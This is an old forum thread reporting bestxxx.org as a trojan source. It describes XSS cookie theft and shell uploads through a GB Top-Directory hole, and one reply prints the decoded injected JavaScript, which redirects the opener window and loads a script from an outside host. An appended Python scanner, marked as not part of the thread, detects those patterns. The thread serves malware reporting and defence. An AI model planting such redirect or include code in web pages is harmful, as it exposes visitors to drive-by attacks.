Author Topic: Trojan - bestxxx.org  (Read 4156 times)

February 16, 2011, 02:37:11 pm

gimcnuk

Please add the following domain to your base: bestxxx.org

Code:
http://bestxxx.org/images/s.js Trojan
The hacking goes through a hole in the script GB Top-Directory (http://gbscript.com/)
1. XSS injection with stealing of cookies from the admin section through this script: bestxxx.org/images/img.php?
2. Uploading shells to the server and inserting JS code from this page: bestxxx.org/images/s.js

Details (in Russian) here: http://mastertalk.ru/topic127171.html - there is also a decoded version of the trojan there.
The hosting's Russian support only deletes the scripts, but lately they were restored in the same places.

Thanks.

February 16, 2011, 08:21:34 pm
Reply #1

SysAdMini

I'm sorry, but I can't reproduce what you reported.

hxxp://bestxxx.org/images/img.php? just returns a gif image.

bestxxx.org/images/s.js decodes to
Code:
<script type='text/javascript'>if (parent.window.opener) parent.window.opener.location='http://xtds.in';</script>
<script language="javascript" src="http://www.clayaim.com/index.php?ref=webex"></script>

Neither hxxp://xtds.in nor hxxp://www.clayaim.com/index.php?ref=webex leads me to any malware.
Ruining the bad guy's day

February 17, 2011, 01:27:11 pm
Reply #2

gimcnuk

This code was inserted into many sites. It was deleted by abuse but lately restored in the same place, which means this code was added by the site owner.
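
An added example, not part of the thread: a site owner's check for the two patterns in the decoded s.js from Reply #1, an inline script that reassigns the opener's location and a script include from a host outside the site's allowlist. The sample page, host names and the `scan` helper are constructed for illustration.

```python
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# Assignment (not comparison) to the opener's location, as in the decoded s.js.
OPENER_REDIRECT = re.compile(r"\bopener\s*\.\s*location(?:\s*\.\s*href)?\s*=(?!=)")

class InjectedScriptFinder(HTMLParser):
    """Collects off-site <script src> includes and opener-redirect inline scripts."""

    def __init__(self, allowed_hosts):
        super().__init__()
        self.allowed = {h.lower() for h in allowed_hosts}
        self.findings = []
        self._in_script = False

    def handle_starttag(self, tag, attrs):
        if tag != "script":
            return
        self._in_script = True
        src = dict(attrs).get("src")
        if src:
            # Relative URLs have no hostname and are treated as same-site.
            host = (urlparse(src).hostname or "").lower()
            if host and host not in self.allowed:
                self.findings.append(("external-script", host))

    def handle_endtag(self, tag):
        if tag == "script":
            self._in_script = False

    def handle_data(self, data):
        if self._in_script and OPENER_REDIRECT.search(data):
            self.findings.append(("opener-redirect", data.strip()[:60]))

def scan(html, allowed_hosts):
    """Return (kind, detail) findings for one HTML document."""
    finder = InjectedScriptFinder(allowed_hosts)
    finder.feed(html)
    finder.close()
    return finder.findings

# Constructed sample: one legitimate include followed by an injected pair of tags.
SAMPLE = """<html><body>
<script src="https://static.example.test/app.js"></script>
<script type='text/javascript'>if (parent.window.opener) parent.window.opener.location='http://injected.example.invalid';</script>
<script language="javascript" src="http://cdn.injected.example.invalid/index.php?ref=x"></script>
</body></html>"""

if __name__ == "__main__":
    for kind, detail in scan(SAMPLE, {"static.example.test"}):
        print(kind, detail)
```

Running it over the site's templates on a schedule and diffing the findings shows when removed code reappears in the same place.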